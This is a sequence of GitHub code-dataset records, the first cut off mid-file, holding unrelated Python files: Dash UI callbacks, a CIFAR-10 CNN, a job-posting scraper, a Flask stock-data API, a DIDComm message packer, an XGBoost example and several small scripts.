acc_str_list]\n\n\n@app.callback(\n Output(\"right_column_loading\", \"children\"),\n acc_input,\n [State(\"right_column_loading\", \"children\")],\n)\ndef show_plot(acc_01, acc_02, acc_03, acc_04, right_children):\n '''\n This function returns the HTML content into the right column of web app based\n on the clicked accordion button and clicked submenu slider value\n '''\n ctx = dash.callback_context\n\n if not ctx.triggered:\n return CONCEPT\n else:\n element_id = ctx.triggered[0][\"prop_id\"].split(\".\")[0]\n\n if (acc_str_list[0] in element_id):\n return CONCEPT\n\n elif (acc_str_list[1] in element_id):\n return MONITOR_FRONTEND\n\n elif (acc_str_list[2] in element_id):\n return TRAINING\n\n elif (acc_str_list[3] in element_id):\n return APPLY_FRONTEND\n else:\n return CONCEPT\n\n\n# controls green color of menu dot\n@app.callback(\n [Output(f\"spandot-{i}\", \"className\") for i in acc_str_list],\n [Input(f\"menuitem-{i}\", \"n_clicks\") for i in acc_str_list],\n [State(f\"spandot-{i}\", \"className\") for i in acc_str_list],\n)\ndef toggle_active_dot(n1, n2, n3, n4,\n active1, active2, active3, active4):\n '''\n Based on click events on the accordion button the style of the spandot in each accordion button\n will be updated\n '''\n\n sty_a = \"menuicon-active\"\n sty_na = \"menuicon-inactive\"\n\n ctx = dash.callback_context\n\n if not ctx.triggered:\n return sty_na, sty_na, sty_na, 
sty_na\n else:\n button_id = ctx.triggered[0][\"prop_id\"].split(\".\")[0]\n if (acc_str_list[0] in button_id):\n return sty_a, sty_na, sty_na, sty_na\n elif (acc_str_list[1] in button_id):\n return sty_na, sty_a, sty_na, sty_na\n elif (acc_str_list[2] in button_id):\n return sty_na, sty_na, sty_a, sty_na\n elif (acc_str_list[3] in button_id):\n return sty_na, sty_na, sty_na, sty_a\n else:\n return sty_na, sty_na, sty_na, sty_na\n\n\nif __name__ == \"__main__\":\n app.run_server(debug=True, port=8050, host=\"0.0.0.0\")\n","repo_name":"herrfeder/AI_Cybersecurity_IDS_PoC","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":17971,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"18899586200","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport json\n\nwith open('versus/bf.json', 'r') as f:\n bf = json.load(f)\n\nwith open('versus/bb.json', 'r') as f:\n bb = json.load(f)\n\nwith open('versus/bb_sparse.json', 'r') as f:\n bb_sparse = json.load(f)\n\nx = list(range(3, 14))\n\np_bf = np.polyfit(x[:len(bf)], bf, len(bf))\nbf = bf + [np.polyval(p_bf, 12), np.polyval(p_bf, 13)]\n\nplt.semilogy(x, bf, 'b', label='brute-force')\nplt.semilogy(x, bb, 'r', label='branch&bound')\n\nplt.title('Branch&Bound vs Brute-Force')\nplt.ylabel('log(secondi)')\nplt.xlabel('nodi')\nplt.legend()\nplt.grid()\n\nplt.savefig('versus/versus.png', dpi=1200)\n\nplt.semilogy(x, bb_sparse, 'g', label='branch&bound sparse')\nplt.legend()\n\nplt.savefig('versus/versus_sparse.png', dpi=1200)\n","repo_name":"mattysaints/progetto-oc","sub_path":"efficiency_plot.py","file_name":"efficiency_plot.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73019764007","text":"import numpy as np\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL']='2'\nfrom random import shuffle\nfrom datetime import timedelta\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport time\nimport pickle\nimport prettytensor as pt\n\nimport cifar10\nif not os.path.exists(\"./cifar_10\"):\n os.makedirs(\"./cifar_10\")\ncifar10.data_path = \"./cifar_10\"\n\n# cifar10.maybe_download_and_extract()\n# images_train, cls_number_train, labels_train = cifar10.load_training_data()\n# images_test, cls_number_test, labels_test = cifar10.load_test_data()\n\nfrom cifar10 import img_size, num_channels, num_classes\nimg_size_cropped = 24\ntrain_batch_size = 100\nclass_names = cifar10.load_class_names()\n# CLASS_NAME\n# [0: 'airplane',\n# 1: 'automobile',\n# 2: 'bird',\n# 3: 'cat',\n# 4: 'deer',\n# 5: 'dog',\n# 6: 'frog',\n# 7: 'horse',\n# 8: 'ship',\n# 9: 'truck']\n\n\nLOGDIR = './logs/cifar_cnn/tensorboard/'\nif not os.path.exists(LOGDIR):\n os.makedirs(LOGDIR)\nMODEL_NAME = \"./saved_model/cifar_cnn/cnn_model.ckpt\"\nMODEL_DIR = \"./saved_model/cifar_cnn\"\nif not os.path.exists(MODEL_DIR):\n os.makedirs(MODEL_DIR)\n\nwith tf.name_scope('input'):\n x = tf.placeholder('float', shape=[None, img_size, img_size, num_channels], name='x')\n y_true = tf.placeholder('float', shape=[None, num_classes], name='y')\n\nglobal_step = tf.Variable(initial_value=0,\n name='global_step', trainable=False)\n\ndef pre_process_image(image, training):\n if training:\n image = tf.random_crop(image, size=[img_size_cropped, img_size_cropped, num_channels])\n\n image = tf.image.random_flip_left_right(image)\n\n # Randomly adjust hue, contrast and saturation.\n image = tf.image.random_hue(image, 
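# hue is shifted by a random delta drawn from [-max_delta, max_delta]\n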
max_delta=0.05)\n image = tf.image.random_contrast(image, lower=0.3, upper=1.0)\n image = tf.image.random_brightness(image, max_delta=0.2)\n image = tf.image.random_saturation(image, lower=0.0, upper=2.0)\n\n # Limit the image pixels between [0, 1] in case of overflow.\n image = tf.minimum(image, 1.0)\n image = tf.maximum(image, 0.0)\n else:\n image = tf.image.resize_image_with_crop_or_pad(image,\n target_height=img_size_cropped,\n target_width=img_size_cropped)\n return image\n\n\ndef pre_process(images, training):\n # Use TensorFlow to loop over all the input images and call\n # the function above which takes a single image as input.\n images = tf.map_fn(lambda image: pre_process_image(image, training), images)\n\n return images\n\n\ndef convolution_neural_network(images, training):\n x_pretty = pt.wrap(images)\n\n # Pretty Tensor uses special numbers to distinguish between\n # the training and testing phases.\n if training:\n phase = pt.Phase.train\n else:\n phase = pt.Phase.infer\n\n with pt.defaults_scope(activation_fn=tf.nn.relu, phase=phase):\n y_pred, loss = x_pretty.\\\n conv2d(kernel=5, depth=64, name='conv_layer1', batch_normalize=True).\\\n conv2d(kernel=5, depth=64, name='conv_layer2').\\\n max_pool(kernel=2, stride=2).\\\n conv2d(kernel=5, depth=128, name='conv_layer3').\\\n conv2d(kernel=5, depth=128, name='conv_layer4').\\\n max_pool(kernel=2, stride=2).\\\n conv2d(kernel=5, depth=256, name='conv_layer5').\\\n conv2d(kernel=5, depth=256, name='conv_layer6', batch_normalize=True).\\\n max_pool(kernel=2, stride=2).\\\n flatten().\\\n fully_connected(size=2048, name='fc_layer1').\\\n fully_connected(size=1024, name='fc_layer2').\\\n softmax_classifier(num_classes=num_classes, labels=y_true)\n\n return y_pred, loss\n\ndef create_network(training):\n with tf.device(\"/cpu:0\"):\n with tf.variable_scope('network', reuse=None):\n images = x\n images = pre_process(images=images, training=training)\n\n y_pred, loss = convolution_neural_network(images=images, training=training)\n\n return y_pred, loss","repo_name":"DKhanh/VisualRecognition","sub_path":"cifarModel.py","file_name":"cifarModel.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22727160342","text":"from setuptools import setup, find_packages\nimport os\n\nversion = '1.0'\n\nsetup(name='cs.portlet.calendar',\n version=version,\n description=\"Calendar portlet using fullcalendar.io\",\n long_description=open(\"README.rst\").read() + \"\\n\" +\n open(os.path.join(\"docs\", \"HISTORY.txt\")).read(),\n # Get more strings from\n # http://pypi.python.org/pypi?:action=list_classifiers\n classifiers=[\n \"Framework :: Plone :: 5.0\",\n \"Framework :: Plone :: 5.1\",\n \"Framework :: Plone\",\n \"Programming Language :: Python\",\n ],\n keywords='plone portlet calendar fullcalendar',\n author='Mikel Larreategi',\n author_email='mlarreategi@codesyntax.com',\n url='https://github.com/codesyntax/cs.portlet.calendar',\n license='GPLv2',\n packages=find_packages(exclude=['ez_setup']),\n namespace_packages=['cs', 'cs.portlet'],\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n 'setuptools',\n # -*- Extra requirements: -*-\n 'plone.api'\n ],\n extras_require={'test': [\n 'collective.MockMailHost',\n 'plone.app.testing',\n ]},\n entry_points=\"\"\"\n # -*- Entry points: -*-\n\n [z3c.autoinclude.plugin]\n target = plone\n \"\"\",\n 
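# the z3c.autoinclude plugin entry point lets Plone load this package's ZCML without an explicit include\n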
)\n","repo_name":"codesyntax/cs.portlet.calendar","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15947803516","text":"n = int(input())\nmod = 7\n\n_n = n\ndigits = 0\nwhile _n > 0:\n n = n*10 + _n%10\n _n //= 10\n digits += 1\nn %= 10**digits\n\ncnt = 0\nfor i in range(1, 2**digits):\n candidate = 0\n _n = n\n\n while i > 0:\n if i % 2:\n candidate = candidate*10 + _n%10\n _n //= 10\n i //= 2\n\n if candidate % mod == 0:\n cnt += 1\n\nprint(cnt)\n","repo_name":"proman3419/AGH-WIET-INF-WDI-2020","sub_path":"2/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22418399405","text":"# TAPP5: Job Info to Excel\n# \n# This is inspired by my current job hunt and needing to keep all of my applications oragnized\n# This takes the url of an Indeed or LinkedIn job posting, pulls all of the relevant information\n# and puts it into an existing excel spreadsheet\n\n# To use, enter your workbook name on line 22 and run the script and paste in the indeed job url\n# Then go to https://rapidapi.com/mantiks-mantiks-default/api/indeed12 and sign up for an API key\n# Enter that API key on line 23\n# If you want to add multiple jobs, create a text file with the job urls separated by a new line and\n# enter it on line 24\n\nimport requests # used for making the call to the Indeed API\nfrom openpyxl import load_workbook # used for writing to the excel spreadsheet\nimport datetime # used for getting the current date\nfrom bs4 import BeautifulSoup # used for parsing the LinkedIn job postings\n\n\"\"\"Enter your workbook name, API key, and name of your text document with your job links\n here. I have chosen to keep them hardcoded but workbook name and the text document could\n be put into main and entered through input if you want separate workbooks for different \n job searches or have different files you want to add jobs from\"\"\"\nWB_NAME = \"YOUR_WORKBOOK_NAME.xlsx\"\nAPI_KEY = \"YOUR_API_KEY\"\njob_doc = \"YOUR_JOB_DOC.txt\"\n\ndef main():\n multiple = input('Are there multiple jobs you want to add? 
(y/n): ')\n if multiple.lower()[:1] == 'y': # enter if there are multiple jobs to add\n with open(job_doc) as job_links:\n for job_url in job_links:\n if \"indeed\" in job_url:\n try:\n info = get_indeed_job_info(job_url) # call the function to get the job info from the Indeed API\n enter_info(info) # call the function to enter the info into the excel spreadsheet\n except:\n print(\"Invalid url\")\n elif \"linkedin\" in job_url: # enter if the job is on LinkedIn\n try:\n info = get_linkedin_job_info(job_url) # call the function to get the job info from the LinkedIn API\n enter_info(info)\n except:\n print(\"Invalid url\")\n else:\n job_url = input('Enter the url of the job posting: ') # get the url of the job posting\n if \"indeed\" in job_url:\n try:\n info = get_indeed_job_info(job_url)\n enter_info(info)\n except:\n print(\"Invalid url\")\n elif \"linkedin\" in job_url:\n try:\n info = get_linkedin_job_info(job_url)\n enter_info(info)\n except:\n print(\"Invalid url\")\n\ndef get_indeed_job_info(job_url): # function to get the job info from the Indeed API\n job_id = job_url[job_url.index('jk=')+3:job_url.index('&vjs')] # get the job id from the url\n\n url = \"https://indeed12.p.rapidapi.com/job/\"+job_id # create the url for the Indeed API call\n\n headers = {\n \"X-RapidAPI-Key\": API_KEY,\n \"X-RapidAPI-Host\": \"indeed12.p.rapidapi.com\"\n }\n\n response = requests.request(\"GET\", url, headers=headers) # make the call to the Indeed API\n\n posting_dict = response.json() # convert the response to a dictionary\n\n job_title = posting_dict['job_title'] # get the job title\n\n company = posting_dict['company']['name'] # get the company name\n\n location_dirty = posting_dict['location'] # get the location\n location = ''.join([i for i in location_dirty if not i.isdigit()]) # remove the zip code from the location if it exists\n if \"remote\" in location.lower() and not \"hybrid\" in location.lower(): # if the job is remote, add \"Remote\" to the location\n location = \"Remote\"\n\n # get the pay range (only works if it is a pay range explicitly given by the company and it is in salary form, otherwise gives \"Unknown\")\n try:\n pay_index = posting_dict['description'].find('$') # find the index of the first dollar sign (where pay range starts)\n pay_string = posting_dict['description'][pay_index-15: pay_index+35] # get a string that includes the entire pay range\n num_string = pay_string[pay_string.find('$'):pay_string.find(\"per\")-1] # get a string that only includes the pay range\n if \"hour\" in pay_string:\n if '-' in num_string: # if the pay is given as an hourly range\n num_string = num_string.replace('.00', '')\n num_string = num_string.replace(' ', '')\n pay = num_string.replace('$', '') + '/hour'\n elif \"From\" in pay_string or \"from\" in pay_string: # if the pay is given as an hourly minimum\n num_string = num_string.replace('.00', '')\n num_string = num_string.replace(' ', '')\n pay = num_string.replace('$', '') + '/hour+'\n elif \"To\" in pay_string or \"to\" in pay_string: # if the pay is given as an hourly maximum\n num_string = num_string.replace('.00', '')\n num_string = num_string.replace(' ', '')\n pay = \"Up to \" + num_string.replace('$', '') + \"/hour\"\n else:\n num_string = num_string.replace('.00', '')\n pay = num_string.replace('$', '') + '/hour'\n elif \"year\" in pay_string:\n if '-' in pay_string: # if the pay is given as a salary range\n num_string = num_string.replace('.00', '')\n num_string = num_string.replace(' ', '')\n pay = num_string.replace('$', 
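# yearly salary ranges keep the bare numbers; unlike the hourly branches, no '/hour' suffix is appended\n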
'')\n elif \"From\" in pay_string or \"from\" in pay_string: # if the pay is given as a salary minimum\n num_string = num_string.replace('.00', '')\n num_string = num_string.replace(' ', '')\n pay = num_string.replace('$', '') + '+'\n elif \"To\" in pay_string or \"to\" in pay_string: # if the pay is given as a salary maximum\n num_string = num_string.replace('.00', '')\n num_string = num_string.replace(' ', '')\n pay = \"Up to \" + num_string.replace('$', '')\n else:\n pay = \"Unknown\"\n except:\n pay = \"Unknown\"\n\n return([job_title, company, location, pay, job_url])\n\ndef get_linkedin_job_info(job_url): # function to get the job info from the LinkedIn API\n\n response = requests.get(job_url) # get the html of the job posting\n job = response.content # convert the response to a string\n\n soup = BeautifulSoup(job, 'html.parser') # convert the string to a BeautifulSoup object\n \n job_title = soup.find('h1', attrs={'class':'topcard__title'}).text\n\n company = soup.find('a', attrs={'class':'sub-nav-cta__optional-url'}).text\n\n location = soup.find('span', attrs={'class':'sub-nav-cta__meta-text'}).text\n\n pay = \"Unknown\" # default pay is unknown\n # gets the pay (only works if it is an explicitly stated hourly pay)\n try:\n p = soup.find_all('p') # get all the p tags\n for i in p: \n if '$' in i.text: # find the p tag that contains the pay\n pay_section = i.text\n pay = pay_section[pay_section.find('$')+1:pay_section.find('$')+7].rstrip() + \"/hour\" # get pay from the p tag and formats it\n break\n except:\n pass\n\n return([job_title, company, location, pay, job_url])\n \n# enters the info into the excel spreadsheet, must pass a list with the job title, company, location, pay, and url\ndef enter_info(info):\n wb = load_workbook(WB_NAME) # load the excel spreadsheet (must be in the same directory as the script)\n page = wb.active\n\n now = datetime.datetime.now()\n date = str(now.month) + '/' + str(now.day)\n\n page.append([info[0], info[1], info[2], info[3], date, info[4]]) # add the job info to the excel spreadsheet\n wb.save(filename=WB_NAME)\n\nif __name__ == \"__main__\":\n main()","repo_name":"andrewlemay/TackleAnyPythonProject","sub_path":"TAPP5_JobInfoToExcel.py","file_name":"TAPP5_JobInfoToExcel.py","file_ext":"py","file_size_in_byte":7931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25651483508","text":"from flask_sqlalchemy import SQLAlchemy\n\ndb = SQLAlchemy()\n\nfrom flask import Flask, request, jsonify\nfrom .config import Config\nimport requests\nimport os\nfrom .models import EODData, User\nimport datetime\nimport time\n\napp = Flask(__name__)\n\nfrom .auth import auth_required\n\naccess_key = Config.ACCESS_KEY\ndb_username = Config.DB_USERNAME\ndb_password = Config.DB_PASSWORD\ndb_server = Config.DB_SERVER\ndb_name = 'eodtracker_test'\n# DB_URL = Config.DB_URL\nDB_URL = 'postgresql+psycopg2://{user}:{pw}@{url}/{db}'.format(user=db_username, pw=db_password, url=db_server,db=db_name)\napp.config['SQLALCHEMY_DATABASE_URI'] = DB_URL\nprint(app.config['SQLALCHEMY_DATABASE_URI'])\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['APPSETTING_ENVIRONMENT'] = Config.APPSETTING_ENVIRONMENT\napp.config['SECRET_KEY'] = 'JamesB0ndoo7'\n\ndb.init_app(app)\n\nwith app.app_context():\n db.create_all()\n\n\ndef convert_to_unix(date):\n return int(time.mktime(time.strptime(date, '%Y-%m-%d')))\n\n\ndef convert_to_datestr(date):\n return 
str(datetime.datetime.fromtimestamp(int(date)).strftime('%Y-%m-%dT%H:%M:%S+%fZ'))[:-3]  # %f renders as '000000' here, so slicing off the last 3 chars leaves a '+0000'-style suffix\n\n\n@app.route('/eod', methods=['GET'])\n@auth_required\ndef get_eod_data():\n    try:\n        if request.args.get('symbol'):\n            symbol = request.args.get('symbol')\n        else:\n            return 'Ticker symbol required.', 400\n\n        highest_date = db.session.query(db.func.max(EODData.date)).filter(EODData.symbol == symbol).scalar()\n        lowest_date = db.session.query(db.func.min(EODData.date)).filter(EODData.symbol == symbol).scalar()\n        original_from_date = 0\n        if request.args.get('from_date'):\n            from_date = request.args.get('from_date')\n            from_date_unix = convert_to_unix(from_date)\n            original_from_date = from_date_unix\n        else:\n            from_date = ''\n            from_date_unix = lowest_date\n        if request.args.get('to_date'):\n            to_date = request.args.get('to_date')\n            to_date_unix = convert_to_unix(to_date)\n        else:\n            to_date = datetime.datetime.utcnow().strftime('%Y-%m-%d')\n            to_date_unix = convert_to_unix(datetime.datetime.utcnow().strftime('%Y-%m-%d'))\n\n        eod_data_list = []\n\n        # Check if the data is in the database\n        DB_Check = True\n        if len(EODData.query.filter_by(symbol=symbol).limit(1).all()) < 1:\n            from_date = \"2008-01-01\"\n            from_date_unix = convert_to_unix(from_date)\n            DB_Check = False\n\n\n        if DB_Check and highest_date is not None and lowest_date is not None and (from_date_unix >= lowest_date) and (\n                highest_date >= to_date_unix):\n            eod_data = EODData.query.filter_by(symbol=symbol).filter(EODData.date >= from_date_unix).filter(\n                EODData.date <= to_date_unix).all()\n            if eod_data:\n                for each_record in eod_data:\n                    each_record_dict = each_record.__dict__.copy()\n                    each_record_dict['date'] = convert_to_datestr(each_record_dict['date'])\n                    each_record_dict.pop('_sa_instance_state', None)\n                    each_record_dict.pop('id', None)\n                    eod_data_list.append(each_record_dict)\n\n            return jsonify(DB_data=eod_data_list)\n\n        # If the data is not in the database, make the API call to the Marketstack EOD API\n        api_url = f'http://api.marketstack.com/v1/eod?access_key={access_key}&symbols={symbol}&date_from={from_date}&date_to={to_date}'\n        print(datetime.datetime.now())\n        print(api_url)\n        response = requests.get(api_url)\n        data = response.json()\n\n        for record in data['data']:\n            record_date_unix = convert_to_unix(record['date'].split(\"T\")[0])\n            if record_date_unix >= original_from_date:\n                eod_data_list.append({\"symbol\": record['symbol'],\n                                      \"date\": record['date'],\n                                      \"open\": record['open'],\n                                      \"high\": record['high'],\n                                      \"low\": record['low'],\n                                      \"close\": record['close'],\n                                      \"volume\": record['volume']})\n\n            existing_record = EODData.query.filter_by(symbol=record['symbol']).filter_by(date=record_date_unix).first()\n            if existing_record is None:\n                eod_data = EODData(symbol=record['symbol'],\n                                   date=record_date_unix,\n                                   open=record['open'],\n                                   high=record['high'],\n                                   low=record['low'],\n                                   close=record['close'],\n                                   volume=record['volume'])\n\n                db.session.add(eod_data)\n                try:\n                    db.session.commit()\n                except Exception:\n                    db.session.rollback()  # keep the session usable if the insert fails\n        return jsonify(API_data=eod_data_list)\n    except Exception as e:\n        print(e)\n        return \"Invalid request\", 400\n\n\n@app.route('/change-in-price', methods=['GET'])\n@auth_required\ndef change_in_price():\n    # Get the symbol and number of days from the request query parameters\n    symbol = request.args.get('symbol')\n    num_days = request.args.get('num_days')\n    if app.config['APPSETTING_ENVIRONMENT'] == 'production':\n        return 'This endpoint is not available in the current environment', 404\n\n    # Get the data for the given symbol from the database and calculate the 
change in price\n    eod_data = EODData.query.filter_by(symbol=symbol).order_by(EODData.date.desc()).limit(num_days).all()\n    if eod_data:\n        change_in_price = eod_data[0].close - eod_data[-1].close\n        return f'The change in price for {symbol} over the past {num_days} days is {change_in_price}. Note: the difference is calculated only from the data available in the database.'\n    else:\n        return 'Symbol/Ticker is not available in DB'\n\n\n@app.route('/')\ndef index():\n    try:\n        webapp_env = os.environ['APPSETTING_ENVIRONMENT']\n        img_id = os.environ['imageid']\n    except KeyError:\n        webapp_env = ''\n        img_id = ''\n    return 'Hello, You are in ' + str(webapp_env) + ' environment. We are using image - ' + str(img_id)\n\n\nif __name__ == \"__main__\":\n    port = 80\n    app.run(host=\"0.0.0.0\", port=port)\n","repo_name":"harsharede/eodtracker_CI","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
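# --- Editor's note: illustrative usage, standalone; not part of app.py above. ---
# The app's convert_to_unix()/convert_to_datestr() pair round-trips dates through
# local-time unix timestamps (time.mktime is timezone-dependent, so the integer
# differs per machine, but the date survives the round trip).
import time
import datetime

def to_unix(date_str):  # mirrors convert_to_unix() above
    return int(time.mktime(time.strptime(date_str, '%Y-%m-%d')))

ts = to_unix('2021-06-01')
print(datetime.datetime.fromtimestamp(ts).date())  # 2021-06-01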
 +{"seq_id":"27013987340","text":"from __future__ import annotations\n\nfrom dataclasses import dataclass\nfrom typing import Optional, Union\n\nfrom didcomm.common.resolvers import ResolversConfig\nfrom didcomm.common.types import JSON, DID_OR_DID_URL, DID_URL, JSON_OBJ\nfrom didcomm.core.serialization import dict_to_json\nfrom didcomm.core.sign import sign\nfrom didcomm.core.utils import is_did\nfrom didcomm.errors import DIDCommValueError\nfrom didcomm.core.from_prior import pack_from_prior_in_place\nfrom didcomm.message import Message\n\n\nasync def pack_signed(\n    resolvers_config: ResolversConfig,\n    message: Union[Message, JSON_OBJ],\n    sign_frm: DID_OR_DID_URL,\n    pack_params: Optional[PackSignedParameters] = None,\n) -> PackSignedResult:\n    \"\"\"\n    Produces `DIDComm Signed Message`\n    https://identity.foundation/didcomm-messaging/spec/#didcomm-signed-message.\n\n    The method signs (non-repudiation added) the message keeping it unencrypted.\n\n    Signed messages are only necessary when\n    - the origin of plaintext must be provable to third parties\n    - or the sender can’t be proven to the recipient by authenticated encryption because the recipient\n      is not known in advance (e.g., in a broadcast scenario).\n\n    Adding a signature when one is not needed can degrade rather than enhance security because it\n    relinquishes the sender’s ability to speak off the record.\n\n    Signing is done as follows:\n    - Signing is done via the keys from the `authentication` verification relationship in the DID Doc\n      for the DID to be used for signing\n    - If `sign_frm` is a DID, then the first sender's `authentication` verification method is used for which\n      a private key in the _secrets resolver is found\n    - If `sign_frm` is a key ID, then the sender's `authentication` verification method identified by the given key ID is used.\n\n    :param resolvers_config: secrets and DIDDoc resolvers\n    :param message: The message to be packed into a DIDComm message\n    :param sign_frm: DID or key ID the sender uses for signing.\n    :param pack_params: Optional parameters for pack\n\n    :raises DIDDocNotResolvedError: If a DID can not be resolved to a DID Doc.\n    :raises DIDUrlNotFoundError: If a DID URL (for example a key ID) is not found within a DID Doc\n    :raises SecretNotFoundError: If there is no secret for the given DID or DID URL (key ID)\n    :raises DIDCommValueError: If invalid input is provided.\n\n    :return: PackSignedResult\n    \"\"\"\n    pack_params = pack_params or PackSignedParameters()\n\n    __validate(sign_frm)\n\n    if isinstance(message, Message):\n        message = message.as_dict()\n\n    from_prior_issuer_kid = await pack_from_prior_in_place(\n        message,\n        resolvers_config,\n        pack_params.from_prior_issuer_kid,\n    )\n\n    sign_result = await sign(message, sign_frm, resolvers_config)\n    packed_msg = dict_to_json(sign_result.msg)\n\n    return PackSignedResult(\n        packed_msg=packed_msg,\n        sign_from_kid=sign_result.sign_frm_kid,\n        from_prior_issuer_kid=from_prior_issuer_kid,\n    )\n\n\n@dataclass(frozen=True)\nclass PackSignedResult:\n    \"\"\"\n    Result of pack operation.\n\n    Attributes:\n        packed_msg (str): A packed message as a JSON string\n        sign_from_kid (DID_URL): Identifier (DID URL) of sender key used for message signing\n        from_prior_issuer_kid (DID_URL): Identifier (DID URL) of issuer key used for signing from_prior.\n            None if the message does not contain from_prior.\n    \"\"\"\n\n    packed_msg: JSON\n    sign_from_kid: DID_URL\n    from_prior_issuer_kid: Optional[DID_URL] = None\n\n\n@dataclass\nclass PackSignedParameters:\n    \"\"\"\n    Optional parameters for pack.\n\n    Attributes:\n        from_prior_issuer_kid (DID_URL): If from_prior is specified in the source message,\n            this field can explicitly specify which key to use for signing from_prior\n            in the packed message\n    \"\"\"\n\n    from_prior_issuer_kid: Optional[DID_URL] = None\n\n\ndef __validate(sign_frm: DID_OR_DID_URL):\n    if not is_did(sign_frm):\n        raise DIDCommValueError(\n            f\"`sign_from` value is not a valid DID or DID URL: {sign_frm}\"\n        )\n","repo_name":"sicpa-dlab/didcomm-python","sub_path":"didcomm/pack_signed.py","file_name":"pack_signed.py","file_ext":"py","file_size_in_byte":4191,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"70093587047","text":"\"\"\"!\nadd new text information to textinfo.json\n\"\"\"\n\nimport argparse\nimport os\nfrom agsearch.utils import DATA_DIR, add_to_text_info_db\nfrom agsearch.textinfo import TextInfo\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser(description=\"Add textinfo to database\")\n    parser.add_argument(\"text_id\", help=\"Text Identifier for the textinfo database\")\n    parser.add_argument(\n        \"local_text_path\",\n        help=\"Text path for adding to textinfo database. It should be given relative to textinfo.json file\",\n    )\n    parser.add_argument(\n        \"has_chunks\",\n        help=\"If text has chunks (columns, lines etc), we segment them during processing\",\n        type=int,\n        choices=[0, 1],\n    )\n    parser.add_argument(\n        \"--chunk_sep\",\n        help=\"Chunk separator assumed to be newline char \\\\n by default\",\n        default=\"\\n\",\n    )\n    parser.add_argument(\"--url\", help=\"Text url for the path\")\n    args = parser.parse_args()\n    tpath = args.local_text_path\n    tpath = os.path.join(DATA_DIR, tpath)\n    if not os.path.isfile(tpath):\n        raise ValueError(\"text path does not exist \" + tpath)\n\n    info = {\n        args.text_id: {\n            \"has_chunks\": bool(args.has_chunks),\n            \"chunk_separator\": args.chunk_sep,\n            \"url\": args.url,\n            \"local_path\": args.local_text_path,\n        }\n    }\n    add_to_text_info_db(info=info)\n","repo_name":"D-K-E/agsearch-python","sub_path":"agsearch/add_textinfo.py","file_name":"add_textinfo.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16542979421","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# import the usual packages\nimport xgboost as xgb\nimport numpy as np\nfrom sklearn import datasets\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.feature_selection import SelectFromModel\n\n\n# In[2]:\n\n\n# load the dataset\ncancer = datasets.load_breast_cancer()\nX = cancer.data\nY = cancer.target\n\n\n# In[3]:\n\n\n# inspect the dataset\n# X.shape\n# Y.shape\n# X, Y\n\n\n# In[4]:\n\n\n# split into train and test sets\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size = 1/5., random_state = 8)\n\n\n# In[5]:\n\n\nxgb_train = xgb.DMatrix(X_train, label = Y_train)\nxgb_test = xgb.DMatrix(X_test, label = Y_test)\n\n\n# In[6]:\n\n\nparams = {\"objective\": \"binary:logistic\",\n          \"booster\": \"gbtree\",\n          \"eta\": 0.1,\n          \"max_depth\": 5\n          }\n\n\n# In[7]:\n\n\nnum_round = 50\n\n\n# In[8]:\n\n\nwatchlist = 
[(xgb_test, 'eval'), (xgb_train, 'train')]\n\n\n# In[9]:\n\n\nbst = xgb.train(params, xgb_train, num_boost_round = 20, evals = watchlist)\n\n\n# In[10]:\n\n\n# with output_margin = True, predict returns the raw margin values before the sigmoid transform\npred_test = bst.predict(xgb_test, output_margin = True)\npred_test_sigmoid = bst.predict(xgb_test)\n\n\n# In[11]:\n\n\n# apply the sigmoid transform to the raw margin values\n1.0 / (1.0 + np.exp(-pred_test[:30]))\n\n\n# In[12]:\n\n\n# compare element-wise with the sigmoid-transformed predictions\npred_test_sigmoid[:30]\n\n","repo_name":"calxu/xgboost_learning","sub_path":"1_binary_classification/6_predict_2/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
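# --- Editor's note: illustrative, standalone. ---
# The notebook above relies on the logistic link: a raw margin z from
# predict(..., output_margin=True) maps to a probability via
# sigmoid(z) = 1 / (1 + exp(-z)). A numpy-only check:
import numpy as np

margins = np.array([-2.0, 0.0, 3.0])
print(1.0 / (1.0 + np.exp(-margins)))  # [0.11920292 0.5        0.95257413]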
